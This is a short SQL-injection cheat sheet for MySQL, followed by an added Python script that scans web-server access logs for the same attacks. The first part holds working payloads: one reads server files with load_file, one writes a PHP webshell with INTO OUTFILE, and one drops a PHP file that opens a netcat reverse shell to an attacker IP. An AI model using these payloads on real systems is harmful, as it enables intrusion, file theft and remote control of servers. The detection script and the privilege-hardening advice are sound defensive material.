SQL Shells

Reading files from the server (mysql)

load_file function

http://<IP>/comment.php?id=735 union select 1,2,3,4,load_file('C:/windows/system32/drivers/etc/hosts'),6

Code Injection (mysql)

into OUTFILE

http://<IP>/comment.php?id=735 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'

  • then browse to backdoor.php and run a command by appending ?cmd=<cmd>

http://<IP>/backdoor.php

Spawning a shell (mysql)

  • first, start a netcat listener on your attacking system

  • in this example we will listen on port 9001

  • next, inject into the GET request to connect back to our attacking system on port 9001 via netcat

http://<IP>/comment.php?id=735 union select 1,2,3,4,"<?php exec('nc.exe 10.11.0.76 9001 -e cmd.exe'); ?>",6 into OUTFILE 'c:/xampp/htdocs/reverse_shell.php'

>>> browse to our file, then check back with netcat for the connection.
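From the defender's side, all three techniques above (load_file, INTO OUTFILE, and the PHP drop-in that is then driven through ?cmd=) leave the same traces in the web server's access log: a UNION SELECT in a query string, a load_file() call, an INTO OUTFILE/DUMPFILE clause, a PHP open tag, and later a request to the dropped file with a cmd parameter. The script below is an added detection example, not part of the original notes; it scans constructed Apache-style log lines (the IPs, timestamps and file names are made up) and reports which indicators each request carries. On the MySQL side, both load_file() and INTO OUTFILE require the FILE privilege and are refused entirely when secure_file_priv is set, so checking that the web application's database account lacks FILE and that secure_file_priv is not empty is the corresponding mitigation check.

```python
"""Scan web-server access logs for the MySQL file-read / file-write injection
patterns described above (UNION SELECT, load_file, INTO OUTFILE, a PHP tag in
the query string, and a follow-up ?cmd= request).

Added detection example; the log lines in SAMPLE_LOG are constructed, not taken
from any real server.
"""
import re
from urllib.parse import unquote_plus

# Indicators are matched against the URL-decoded, whitespace-collapsed,
# lowercased request target.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "load_file":    re.compile(r"\bload_file\s*\("),
    "into_outfile": re.compile(r"\binto\s+(outfile|dumpfile)\b"),
    "php_tag":      re.compile(r"<\?php"),
    "cmd_param":    re.compile(r"[?&]cmd="),
}

# Request field of an Apache/nginx combined log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/[\d.]+"')


def normalize(request: str) -> str:
    """URL-decode the request (repeated so a double-encoded request is also
    decoded), collapse runs of whitespace and lowercase it."""
    decoded = request
    for _ in range(3):
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"\s+", " ", decoded).lower()


def classify(request: str) -> list:
    """Return the names of every indicator present in one request target."""
    norm = normalize(request)
    return [name for name, rx in INDICATORS.items() if rx.search(norm)]


def scan_log(lines) -> list:
    """Return (line_no, request, indicators) for every log line that matches
    at least one indicator."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        found = classify(m.group(1))
        if found:
            hits.append((n, m.group(1), found))
    return hits


# Constructed sample: a normal request, a load_file read, a webshell write,
# a request to the dropped file, and a benign query that merely contains "select".
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2024:12:00:01 +0000] "GET /comment.php?id=735 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jan/2024:12:00:07 +0000] "GET /comment.php?id=735%20union%20select%201,2,3,4,'
    "load_file('C:/windows/system32/drivers/etc/hosts'),6 HTTP/1.1\" 200 1024",
    '203.0.113.5 - - [10/Jan/2024:12:00:19 +0000] "GET /comment.php?id=735+union+all+select+1,2,3,4,'
    "%22%3C%3Fphp+echo+shell_exec(%24_GET%5B'cmd'%5D)%3B%3F%3E%22,6+into+OUTFILE+"
    "'c:/xampp/htdocs/backdoor.php' HTTP/1.1\" 200 1024",
    '203.0.113.5 - - [10/Jan/2024:12:00:31 +0000] "GET /backdoor.php?cmd=dir HTTP/1.1" 200 64',
    '198.51.100.9 - - [10/Jan/2024:12:01:02 +0000] "GET /search.php?q=select+a+plan HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, req, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}  {req[:70]}")
```

Run as-is the script reports lines 2, 3 and 4 of the sample and leaves the benign "select a plan" search alone. In practice you would feed it the real access log (or wire the same classify() logic into a log pipeline) and correlate a hit on the webshell-write indicators with a later 200 response for a file that did not exist before.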
